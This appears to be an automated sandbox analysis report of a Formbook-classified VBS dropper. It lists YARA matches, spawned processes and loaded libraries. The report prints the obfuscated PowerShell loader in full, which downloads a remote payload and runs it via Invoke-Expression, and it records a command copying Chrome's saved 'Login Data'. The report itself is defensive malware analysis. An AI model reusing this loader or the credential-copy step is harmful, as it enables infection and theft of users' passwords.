Source: 00000019.00000002.2523572570.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000019.00000002.2523572570.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000019.00000002.2523572570.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000019.00000002.2527878142.00000000006D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000019.00000002.2527878142.00000000006D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000019.00000002.2527878142.00000000006D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000019.00000002.2528076589.0000000000700000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000019.00000002.2528076589.0000000000700000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000019.00000002.2528076589.0000000000700000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000014.00000002.1962975047.00000000006C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000014.00000002.1962975047.00000000006C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000014.00000002.1962975047.00000000006C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: powershell.exe PID: 7428, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 7748, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engine Classification label: mal100.troj.spyw.expl.evad.winVBS@539/14@3/2
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_00C8A010 CoCreateInstance, 25_2_00C8A010
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_00C852BB __EH_prolog3_catch_GS,LoadLibraryExW,FindResourceExW,LoadResource,SizeofResource,MultiByteToWideChar,FreeLibrary, 25_2_00C852BB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Concordal6.Uds
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7444:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7436:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_in3jrmsk.4py.ps1
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\birectangular.vbs"
Source: C:\Windows\SysWOW64\raserver.exe Command line argument: offerraupdate 25_2_00C89AC5
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7428
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7748
Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\birectangular.vbs"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Fantasibilledernes Ansttelsesomraadets Grammates Methodizing Skumredes Synostose Macrotone Guls Scyphiform245 Nonconservation Mirks171 Bonaire Vejrskifte Tekstspalte Forsorgshjemmets Rhyton Skoenne Fullbacks Solbadets Afsnitsindrykningerne Bordeauxvine tyngende Sporingsstationens afnazificering Fantasibilledernes Ansttelsesomraadets Grammates Methodizing Skumredes Synostose Macrotone Guls Scyphiform245 Nonconservation Mirks171 Bonaire Vejrskifte Tekstspalte Forsorgshjemmets Rhyton Skoenne Fullbacks Solbadets Afsnitsindrykningerne Bordeauxvine tyngende Sporingsstationens afnazificering';If (${host}.CurrentCulture) {$Fortrd++;}Function Jimmis($Poria){$Jumpily=$Poria.Length-$Fortrd;$Anteopercle='SUBsTRI';$Anteopercle+='ng';For( $Racialisation=4;$Racialisation -lt $Jumpily;$Racialisation+=5){$Fantasibilledernes+=$Poria.$Anteopercle.Invoke( $Racialisation, $Fortrd);}$Fantasibilledernes;}function Fluorideringen($Uncouthly){ . ($Flanconnade) ($Uncouthly);}$Hoosegow=Jimmis 'Un.eMSklvoFlipz ,deiR,prlSpa lk,nnaAlle/Or,i5tilb. ,dn0Bran Sam,(UndeWCrediJo.nnImprdUdsno Udlw HorsBesl aldNBemyTPrim Vas.1Neig0 Kem.Irri0,lde;Bl,t .onaWRe,aiPaahn .on6 Tre4Wagg; arm Bru.xK rs6Nost4Educ; Wo. CounrklorvB.ot:Lysa1regn2Fald1Xmas. 
Ans0 S.d)Elek KrooGUstiemuhacRestk acoo S.j/came2 P,e0Pa.r1Sk m0Skil0H al1Radr0Foot1Vomi CharFTovaiStikrLeveeOverf FrdoGoloxBrss/unde1Majo2 enn1Okke.Prdi0S,nn ';$Neurocanal151=Jimmis 'UlydUEmpesSloweIlsarQ,nd- .laA PrigInteeGleanFishtskin ';$Skumredes=Jimmis 'BrochSp,ktbookt .onpfac,sStri:Male/ Afa/ Carl DisaRafrrBiocrSvelyB,cof Undr AngaPre,n UngkBree.StancMaybpPal.a ,an/HereN.bekeU,orgDiamuAnoms M t8Cons5Eoga.S.udcIdylshe,lv Gra ';$Minty=Jimmis 'Mero>Jamr ';$Flanconnade=Jimmis ' M.liSidee Sslx.ype ';$Lansquenet='Guls';$Andejagterne = Jimmis 'VelkeSlaucFl.nhNontohydr L.m%Aadsapa.ap SubpForsdCa iaviv.tMiddaP,la%Semi\SikkC SidoE,tanRskncToogoRdbyrSpaddPersaCo elOhmm6 yd.MounU chedHydasForb Am m&Gall& St. SingeMoancT,reh Truo Ade Forbt Hyp ';Fluorideringen (Jimmis 'Piep$.lyhgTreblAc roAntib Arbakumeltest: F.lMW.ttykryso ,hapres.lObfuaFumisHoustSwaniLaarcKons=E,te(HavfcLsevm Litd Sv. ok e/R ascMonc ,mmi$Da,eA Ke niri,dHoddeber j entaAx igParatCodaeIdenrUnpen kiheU.ad)Symp ');Fluorideringen (Jimmis 'Bdep$MirkgWea.lPreco Sexb UheaEighlVgel:DenoM UnseGodit,ambh ageosk,ldRe pi P.ezOminiRealn A,vgFrdi=anet$BlomSBombkSlanu Re.mTakirNa oeDeted rateFrolsSkri.Jords RegpEvanl .ipiAerotBrne(He e$FornM ResiOve.nHvidtorobyKo i)ba,a ');Fluorideringen (Jimmis ' er[deerNBlomeK.sttNig,.ReveSCohaeSlumrSk.fvPro,iKni c ybeTandPFrago Ob iDetan Hu,tArr.MBogbaGorenGra.aNonbgHjste Ungr raa]afgr:Fors: SukSunteedevocJantuLighrVoksiSmletCol.yM.toPPro rTahio.ourt Aflo UdvcLynto N,tl Til Scin= bin Dis,[Br dN DeveD,litObtu.LubeS kaeSmugc Resu SclrQuediInfrtZardy HyaPUnprrlrdooScout CraoMalpcmi,io OsclOplaT ordyNeappRe aeHaak] cuc:Sh
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Concordal6.Uds && echo t"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Fantasibilledernes Ansttelsesomraadets Grammates Methodizing Skumredes Synostose Macrotone Guls Scyphiform245 Nonconservation Mirks171 Bonaire Vejrskifte Tekstspalte Forsorgshjemmets Rhyton Skoenne Fullbacks Solbadets Afsnitsindrykningerne Bordeauxvine tyngende Sporingsstationens afnazificering Fantasibilledernes Ansttelsesomraadets Grammates Methodizing Skumredes Synostose Macrotone Guls Scyphiform245 Nonconservation Mirks171 Bonaire Vejrskifte Tekstspalte Forsorgshjemmets Rhyton Skoenne Fullbacks Solbadets Afsnitsindrykningerne Bordeauxvine tyngende Sporingsstationens afnazificering';If (${host}.CurrentCulture) {$Fortrd++;}Function Jimmis($Poria){$Jumpily=$Poria.Length-$Fortrd;$Anteopercle='SUBsTRI';$Anteopercle+='ng';For( $Racialisation=4;$Racialisation -lt $Jumpily;$Racialisation+=5){$Fantasibilledernes+=$Poria.$Anteopercle.Invoke( $Racialisation, $Fortrd);}$Fantasibilledernes;}function Fluorideringen($Uncouthly){ . ($Flanconnade) ($Uncouthly);}$Hoosegow=Jimmis 'Un.eMSklvoFlipz ,deiR,prlSpa lk,nnaAlle/Or,i5tilb. ,dn0Bran Sam,(UndeWCrediJo.nnImprdUdsno Udlw HorsBesl aldNBemyTPrim Vas.1Neig0 Kem.Irri0,lde;Bl,t .onaWRe,aiPaahn .on6 Tre4Wagg; arm Bru.xK rs6Nost4Educ; Wo. CounrklorvB.ot:Lysa1regn2Fald1Xmas. 
Ans0 S.d)Elek KrooGUstiemuhacRestk acoo S.j/came2 P,e0Pa.r1Sk m0Skil0H al1Radr0Foot1Vomi CharFTovaiStikrLeveeOverf FrdoGoloxBrss/unde1Majo2 enn1Okke.Prdi0S,nn ';$Neurocanal151=Jimmis 'UlydUEmpesSloweIlsarQ,nd- .laA PrigInteeGleanFishtskin ';$Skumredes=Jimmis 'BrochSp,ktbookt .onpfac,sStri:Male/ Afa/ Carl DisaRafrrBiocrSvelyB,cof Undr AngaPre,n UngkBree.StancMaybpPal.a ,an/HereN.bekeU,orgDiamuAnoms M t8Cons5Eoga.S.udcIdylshe,lv Gra ';$Minty=Jimmis 'Mero>Jamr ';$Flanconnade=Jimmis ' M.liSidee Sslx.ype ';$Lansquenet='Guls';$Andejagterne = Jimmis 'VelkeSlaucFl.nhNontohydr L.m%Aadsapa.ap SubpForsdCa iaviv.tMiddaP,la%Semi\SikkC SidoE,tanRskncToogoRdbyrSpaddPersaCo elOhmm6 yd.MounU chedHydasForb Am m&Gall& St. SingeMoancT,reh Truo Ade Forbt Hyp ';Fluorideringen (Jimmis 'Piep$.lyhgTreblAc roAntib Arbakumeltest: F.lMW.ttykryso ,hapres.lObfuaFumisHoustSwaniLaarcKons=E,te(HavfcLsevm Litd Sv. ok e/R ascMonc ,mmi$Da,eA Ke niri,dHoddeber j entaAx igParatCodaeIdenrUnpen kiheU.ad)Symp ');Fluorideringen (Jimmis 'Bdep$MirkgWea.lPreco Sexb UheaEighlVgel:DenoM UnseGodit,ambh ageosk,ldRe pi P.ezOminiRealn A,vgFrdi=anet$BlomSBombkSlanu Re.mTakirNa oeDeted rateFrolsSkri.Jords RegpEvanl .ipiAerotBrne(He e$FornM ResiOve.nHvidtorobyKo i)ba,a ');Fluorideringen (Jimmis ' er[deerNBlomeK.sttNig,.ReveSCohaeSlumrSk.fvPro,iKni c ybeTandPFrago Ob iDetan Hu,tArr.MBogbaGorenGra.aNonbgHjste Ungr raa]afgr:Fors: SukSunteedevocJantuLighrVoksiSmletCol.yM.toPPro rTahio.ourt Aflo UdvcLynto N,tl Til Scin= bin Dis,[Br dN DeveD,litObtu.LubeS kaeSmugc Resu SclrQuediInfrtZardy HyaPUnprrlrdooScout CraoMalpcmi,io OsclOplaT ordyNeappRe aeHaak] cuc:Sh
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Concordal6.Uds && echo t"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\raserver.exe "C:\Windows\SysWOW64\raserver.exe"
Source: C:\Windows\SysWOW64\raserver.exe Process created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user~1\AppData\Local\Temp\DB1" /V
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: unknown Process created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
Source: C:\Windows\SysWOW64\raserver.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Windows\explorer.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: vbscript.dll
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptnet.dll
Source: C:\Windows\System32\wscript.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\wscript.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\wscript.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\wscript.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\wscript.exe Section loaded: webio.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cabinet.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll
Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll
Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll
Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\wscript.exe Section loaded: pcacli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sfc_os.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: esscli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll
